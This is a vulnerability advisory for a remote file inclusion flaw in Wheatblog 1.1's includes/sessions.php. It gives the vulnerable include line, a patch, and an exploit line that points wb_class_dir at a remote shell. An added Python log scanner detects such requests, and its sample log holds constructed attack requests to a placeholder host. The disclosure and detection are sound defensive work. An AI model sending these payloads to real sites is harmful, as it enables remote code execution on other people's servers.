Wheatblog (wB) Remote File inclusion ..

2007-11-22T00:00:00
ID SECURITYVULNS:DOC:18481
Type securityvulns
Reporter Securityvulns
Modified 2007-11-22T00:00:00

Description

Hello,

Wheatblog (wB) Remote File inclusion ..

Tested on 1.1; older versions are also affected.

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

Remote File Inclusion file : includes/sessions.php

Line 2:

    include_once("$wb_class_dir/classDatabase.php");

The variable wb_class_dir can be set from the request, so the include path can be pointed at a file on a remote host, which PHP then fetches and executes.

Solution

Replace the line:

    include_once("$wb_class_dir/classDatabase.php");

with:

    // Protected By : HACKERS PAL
    // Security@soqor.net
    // Http://WwW.SoQoR.NeT
    // Refuse direct requests to this file, and refuse any request that tries to
    // supply wb_class_dir itself (with register_globals on, a query parameter would
    // otherwise overwrite the value set by the application's own configuration).
    // stripos() stands in for eregi(), which no longer exists in PHP 7+, and
    // $_REQUEST replaces the misspelt $_GLOBALS, which is not a PHP superglobal.
    if (stripos($_SERVER['PHP_SELF'], "sessions.php") !== false || isset($_REQUEST['wb_class_dir'])) {
        die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
    }
    include_once("$wb_class_dir/classDatabase.php");

Exploit : - includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?
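As an added example that is not part of the original advisory, the Python below scans web-server access logs for requests that try to supply wb_class_dir to includes/sessions.php, something a legitimate client never does, and labels each hit by whether the value is a remote URL, a path outside the class directory, or plain parameter tampering. The log lines and the 203.0.113.x / 192.0.2.x addresses are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: client ident user [ts] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PARAM = "wb_class_dir"  # set by the application's config, never legitimately by the client
# URL wrappers that PHP include() will fetch when allow_url_include/allow_url_fopen is on
REMOTE_SCHEME = re.compile(r"^(https?|ftp|php|data)://", re.I)

def classify(target):
    """Label a request target: 'rfi', 'lfi', 'tamper', or None when benign."""
    parts = urlsplit(target)
    if not parts.path.endswith("/includes/sessions.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if not values:
        return None
    value = values[0]  # parse_qs has already percent-decoded the value
    if REMOTE_SCHEME.match(value):
        return "rfi"     # classDatabase.php would be fetched from an attacker-chosen host
    if ".." in value or value.startswith("/"):
        return "lfi"     # include path pointed outside the class directory
    return "tamper"      # any client-supplied value for this variable is abnormal

def scan(lines):
    """Return (client_ip, label, status) for every log line that trips classify()."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line; skip rather than guess
        label = classify(m["target"])
        if label:
            hits.append((m["ip"], label, int(m["status"])))
    return hits

# Constructed sample log; 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges.
SAMPLE_LOG = """
203.0.113.5 - - [22/Nov/2007:10:01:02 +0000] "GET /wb/includes/sessions.php?wb_class_dir=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [22/Nov/2007:10:02:10 +0000] "GET /wb/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Nov/2007:10:03:15 +0000] "GET /wb/includes/sessions.php?wb_class_dir=..%2F..%2Fconfig HTTP/1.1" 200 480 "-" "Mozilla/5.0"
192.0.2.44 - - [22/Nov/2007:10:04:00 +0000] "GET /wb/includes/sessions.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.44 - - [22/Nov/2007:10:05:30 +0000] "GET /wb/includes/sessions.php?wb_class_dir=classes HTTP/1.1" 200 480 "-" "Mozilla/5.0"
""".strip().splitlines()

if __name__ == "__main__":
    for ip, label, status in scan(SAMPLE_LOG):
        print(f"{ip:15} {label:6} HTTP {status}")
```

A 200 on a flagged "rfi" line means the include succeeded and deserves an incident response, not just a firewall rule.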

WwW.SoQoR.NeT